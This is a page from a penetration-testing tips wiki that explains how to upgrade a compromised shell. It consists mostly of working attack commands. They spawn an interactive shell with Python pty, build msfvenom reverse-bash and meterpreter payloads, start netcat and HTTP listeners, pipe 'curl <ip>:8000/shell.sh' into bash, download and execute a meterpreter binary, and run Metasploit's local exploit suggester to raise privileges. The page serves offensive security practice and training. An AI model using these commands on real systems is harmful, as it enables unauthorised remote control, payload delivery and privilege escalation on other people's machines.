Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
Powered by GitBook
On this page
  • Using Python Pty
  • Metasploit (Linux):
Edit on GitHub
  1. Network Exploitation

Shell Upgrades

Using Python Pty

#In the dumb shell
python -c 'import pty; pty.spawn("/bin/bash")'

# ^Z to stop the netcat session. Then type
stty raw -echo; fg

Metasploit (Linux):

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

Use your unstable shell to download the stable shell bin:

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

set payload linux/x86/meterpreter/reverse_tcp
use exploit/multi/handler
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
exploit
PreviousPassword CrackingNextLinux PrivEsc

Last updated 2 years ago